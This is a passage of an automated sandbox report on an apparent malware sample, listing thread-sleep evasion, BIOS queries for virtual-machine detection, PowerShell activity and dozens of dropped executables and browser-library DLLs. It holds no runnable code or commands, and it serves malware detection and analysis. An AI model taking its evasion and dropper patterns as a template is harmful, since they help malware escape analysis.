                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597794
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597388
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 596942
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1156
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1120
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1116
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1109
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1125
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeWindow / User API: threadDelayed 2541
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeWindow / User API: threadDelayed 512
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7383
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2408
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7410
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2285
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeWindow / User API: threadDelayed 619
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3641
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1223
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2909
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 743
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5070
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 652
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3613
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2011
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 360
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2516
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 573
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_ssl.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32event.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32process.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780Jump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_tkinter.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32trace.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\tk85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcm90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\bz2.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\eIgpINK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32api.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcp90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32ui.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\pywintypes27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\python27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_win32sysloader.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\tcl85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\pythoncom27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe TID: 6136Thread sleep time: -210000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 6376Thread sleep time: -40020s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 5176Thread sleep time: -34017s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 4648Thread sleep time: -44022s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 5960Thread sleep time: -36018s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 1772Thread sleep time: -50025s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep count: 1156 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep time: -2313156s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7768Thread sleep count: 1120 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7768Thread sleep time: -2241120s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776Thread sleep count: 1116 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776Thread sleep time: -2233116s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752Thread sleep count: 135 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752Thread sleep time: -4050000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep count: 1109 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep time: -2219109s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760Thread sleep count: 1125 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760Thread sleep time: -2251125s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep count: 152 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep time: -304152s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -100000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99863s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99727s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99598s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99456s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99339s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99141s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98925s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98381s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98253s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98119s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97971s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97838s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97701s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97579s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97428s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97307s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97185s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97050s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -96931s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -96724s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -598111s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597950s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597794s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597388s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -596942s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 7004Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 1004Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 7383 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 2408 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe TID: 3912Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep count: 7410 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 2285 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5288Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe TID: 4084Thread sleep count: 619 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe TID: 5720Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep count: 3641 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948Thread sleep count: 1223 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 2909 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 743 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep time: -10145709240540247s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 812Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe TID: 628Thread sleep count: 332 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 3613 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe TID: 2860Thread sleep time: -240000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 2011 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628Thread sleep count: 360 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 2516 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 573 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C585070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,3_2_6C585070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46EBF0 PR_GetNumberOfProcessors,GetSystemInfo,3_2_6C46EBF0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 100000
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99863
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99727
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99598
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99456
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99339
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99141
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98925
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98381
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98253
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98119
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97971
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97838
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97701
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97579
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97428
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97307
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97185
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97050
